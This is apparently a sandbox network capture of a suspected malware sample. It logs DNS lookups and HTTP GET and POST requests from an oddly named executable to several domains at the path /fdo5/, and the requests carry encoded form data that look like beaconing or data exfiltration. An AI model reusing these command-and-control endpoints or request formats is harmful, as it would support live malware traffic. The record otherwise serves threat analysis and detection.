                                                                                              Dec 3, 2023 16:26:33.548136950 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.548150063 CET8049746109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:33.548240900 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:33.548329115 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:34.865075111 CET4974680192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:35.880877018 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.062630892 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.062728882 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.063855886 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:36.245349884 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245585918 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245599031 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245676994 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245688915 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.245735884 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247498035 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247513056 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247523069 CET8049747109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:36.247564077 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:37.567991972 CET4974780192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.584002972 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.894198895 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:38.894325018 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:38.894529104 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.164745092 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.164772987 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.164786100 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:39.165044069 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.165461063 CET4974880192.168.2.4109.68.33.25
                                                                                              Dec 3, 2023 16:26:39.446849108 CET8049748109.68.33.25192.168.2.4
                                                                                              Dec 3, 2023 16:26:44.562345028 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.735400915 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:44.735589981 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.735837936 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:44.906831026 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033732891 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033751965 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033763885 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033777952 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.033818960 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:45.033905983 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:45.033993959 CET804974966.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:45.034045935 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:46.239898920 CET4974980192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.255882978 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.420615911 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.421148062 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.421148062 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.584851980 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689701080 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689726114 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689738035 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689752102 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.689789057 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.689821005 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:47.690017939 CET804975066.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:47.690150023 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:48.927426100 CET4975080192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:49.943264008 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.106885910 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.107022047 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.107712030 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.271842003 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271903992 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271919966 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.271938086 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387907982 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387933016 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387953997 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.387972116 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.388062000 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.388072968 CET804975166.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:50.388098955 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:50.388113976 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:51.615017891 CET4975180192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.631073952 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.795098066 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:52.795383930 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.795949936 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:52.959495068 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129287004 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129312992 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129327059 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129342079 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129359007 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:53.129597902 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:53.130192995 CET4975280192.168.2.466.29.155.54
                                                                                              Dec 3, 2023 16:26:53.297668934 CET804975266.29.155.54192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.268563986 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.539413929 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.539530039 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.539813042 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.811713934 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811739922 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811755896 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811773062 CET804975352.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.811808109 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:26:58.811849117 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:00.052367926 CET4975380192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.068357944 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.337385893 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.337506056 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.337733030 CET4975480192.168.2.452.68.224.126
                                                                                              Dec 3, 2023 16:27:01.607656002 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607826948 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607875109 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:27:01.607891083 CET804975452.68.224.126192.168.2.4
                                                                                              Dec 3, 2023 16:29:01.442838907 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:05.458448887 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:13.458455086 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:20.478786945 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:21.489751101 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:23.540615082 CET4976980192.168.2.443.154.179.176
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2023 16:25:44.019479036 CET | 192.168.2.4 | 1.1.1.1 | 0x9ba3 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:00.225182056 CET | 192.168.2.4 | 1.1.1.1 | 0x1756 | Standard query (0) | www.tongtu150.click | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:08.460575104 CET | 192.168.2.4 | 1.1.1.1 | 0x9a6a | Standard query (0) | www.quote2bill.com | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:21.772303104 CET | 192.168.2.4 | 1.1.1.1 | 0x5f3b | Standard query (0) | www.kateandrae.com | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:30.131525040 CET | 192.168.2.4 | 1.1.1.1 | 0x95b6 | Standard query (0) | www.fdissolutions.net | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:44.179333925 CET | 192.168.2.4 | 1.1.1.1 | 0xe0a8 | Standard query (0) | www.pay4dance.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:58.131499052 CET | 192.168.2.4 | 1.1.1.1 | 0x7949 | Standard query (0) | www.busan3-200.com | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:12.475166082 CET | 192.168.2.4 | 1.1.1.1 | 0x9e80 | Standard query (0) | www.wrautomotive.online | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:26.818763971 CET | 192.168.2.4 | 1.1.1.1 | 0xba14 | Standard query (0) | www.pace-drive-coupons.com | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:35.477665901 CET | 192.168.2.4 | 1.1.1.1 | 0x4fbd | Standard query (0) | www.poria.link | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:28:20.084345102 CET | 192.168.2.4 | 1.1.1.1 | 0x5053 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:28:35.303936958 CET | 192.168.2.4 | 1.1.1.1 | 0x85f5 | Standard query (0) | www.waimaier2.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2023 16:25:44.209698915 CET | 1.1.1.1 | 192.168.2.4 | 0x9ba3 | No error (0) | www.rssnewscast.com |  | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:00.410727978 CET | 1.1.1.1 | 192.168.2.4 | 0x1756 | Server failure (2) | www.tongtu150.click | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:08.692002058 CET | 1.1.1.1 | 192.168.2.4 | 0x9a6a | No error (0) | www.quote2bill.com |  | 185.151.30.138 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:21.907979965 CET | 1.1.1.1 | 192.168.2.4 | 0x5f3b | Name error (3) | www.kateandrae.com | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:30.477791071 CET | 1.1.1.1 | 192.168.2.4 | 0x95b6 | No error (0) | www.fdissolutions.net |  | 109.68.33.25 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:44.561160088 CET | 1.1.1.1 | 192.168.2.4 | 0xe0a8 | No error (0) | www.pay4dance.xyz |  | 66.29.155.54 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:26:58.266987085 CET | 1.1.1.1 | 192.168.2.4 | 0x7949 | No error (0) | www.busan3-200.com | busan3-200.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2023 16:26:58.266987085 CET | 1.1.1.1 | 192.168.2.4 | 0x7949 | No error (0) | busan3-200.com |  | 52.68.224.126 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:12.942491055 CET | 1.1.1.1 | 192.168.2.4 | 0x9e80 | No error (0) | www.wrautomotive.online | wrautomotive.online |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2023 16:27:12.942491055 CET | 1.1.1.1 | 192.168.2.4 | 0x9e80 | No error (0) | wrautomotive.online |  | 37.97.254.27 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:27.415332079 CET | 1.1.1.1 | 192.168.2.4 | 0xba14 | Server failure (2) | www.pace-drive-coupons.com | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:35.857436895 CET | 1.1.1.1 | 192.168.2.4 | 0x4fbd | No error (0) | www.poria.link |  | 172.67.184.73 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:27:35.857436895 CET | 1.1.1.1 | 192.168.2.4 | 0x4fbd | No error (0) | www.poria.link |  | 104.21.18.253 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:28:20.692142010 CET | 1.1.1.1 | 192.168.2.4 | 0x5053 | No error (0) | www.kasegitai.tokyo |  | 202.172.28.202 | A (IP address) | IN (0x0001) | false
Dec 3, 2023 16:28:36.201072931 CET | 1.1.1.1 | 192.168.2.4 | 0x85f5 | No error (0) | www.waimaier2.store |  | 43.154.179.176 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49739 | 91.195.240.94 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:25:44.407182932 CET | 462 | OUT | GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w== HTTP/1.1
                                                                                              Host: www.rssnewscast.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:25:44.657303095 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                              date: Sun, 03 Dec 2023 15:25:44 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S9gB49a0A3qsAYxMBvt/gnI3Dk0us/DsLWLW5XP9Ehl5W/mpQ6OCEPTktvFYbUNM/rpiGSmKwxBdtIu2K6YWWQ==
                                                                                              last-modified: Sun, 03 Dec 2023 15:25:44 GMT
                                                                                              x-cache-miss-from: parking-698fb476bf-g877q
                                                                                              server: NginX
                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 185.151.30.138 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:08.792280912 CET | 724 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.quote2bill.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.quote2bill.com
                                                                                              Referer: http://www.quote2bill.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=JCblnxph1oRqRvVPzAcsJlKCpAB1VUdutVEFYFuCmVbwLtp7thulAkUq1uc8N2UlNOFUxKGIV7402AsRw0mVPpsgnOsZlRAZs164z1yfrMOv0SS2RfvAYfKhj6y0Ot+dKB+YKtRdEPas9scd7JCI+yM5f5ZZYW2JwfFLeDBCBvTInpPjTA==
Dec 3, 2023 16:26:08.891115904 CET | 857 | IN | HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:25:59 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              x-via: ASH1
                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49741 | 185.151.30.138 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:11.419369936 CET | 744 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.quote2bill.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.quote2bill.com
                                                                                              Referer: http://www.quote2bill.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:11.518281937 CET | 857 | IN | HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:26:09 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              x-via: ASH1
                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49743 | 185.151.30.138 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:14.051470041 CET | 10826 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.quote2bill.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.quote2bill.com
                                                                                              Referer: http://www.quote2bill.com/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:14.150461912 CET | 857 | IN | HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:26:09 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              x-via: ASH1
                                                                                              connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 185.151.30.138 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:16.668056965 CET | 461 | OUT | GET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw== HTTP/1.1
                                                                                              Host: www.quote2bill.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:16.767751932 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:26:09 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-via: ASH1
                                                                                              connection: close
                                                                                              Data Ascii: 443<html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="pragma" content="no-cache" /> <title>This domain is brand new</title> <style> html { font-size: 62.5%; } body { margin: 0; padding: 0; font-size: 1.6rem; color: #353535; background: linear-gradient(to bottom, #ccc, #fff 30%); background-repeat: no-repeat; } h1,h3 { font-family: 'Montserrat', sans-serif; text-align: center; margin: 0; padding: 0; text-transform: uppercase; } h1 { margin: 20rem 0 1rem; font-size: 3rem; } h3 { font-weight: normal; font-size: 1.4rem; } </style></head><body> <h1>This Domain is Brand New</h1> <h3>Please check back again soon</h3> <link href='https://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'></body></h
Dec 3, 2023 16:26:16.767774105 CET | 65 | IN | Data Raw: 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: tml>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 109.68.33.25 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:30.659818888 CET | 733 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dec 3, 2023 16:26:30.842624903 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:30 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
Dec 3, 2023 16:26:30.842659950 CET | 193 | IN
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 109.68.33.25 | 80 | 2492 | C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2023 16:26:33.361574888 CET | 753 | OUT | POST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Ascii: 540H2x=vlAIgCjmHBaalhtDWHSQQmIyVvdavP7LQlzUcHzssvo0s5dA1wfBxJBPRGe8q2X8lfaFkEtSz+cFMITtDe1JjSQmxzvziClLKZTV1l1P3Et4cVXFHP1dIKReWw75GGUdgtbkS8SdJ/+opn8in5x2/QZbyv7nJ7XGwD20Njbf6ug6z4mpZMSJocFYVpZhHgV0j+G9rBg=
Dec 3, 2023 16:26:33.548120975 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:32 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
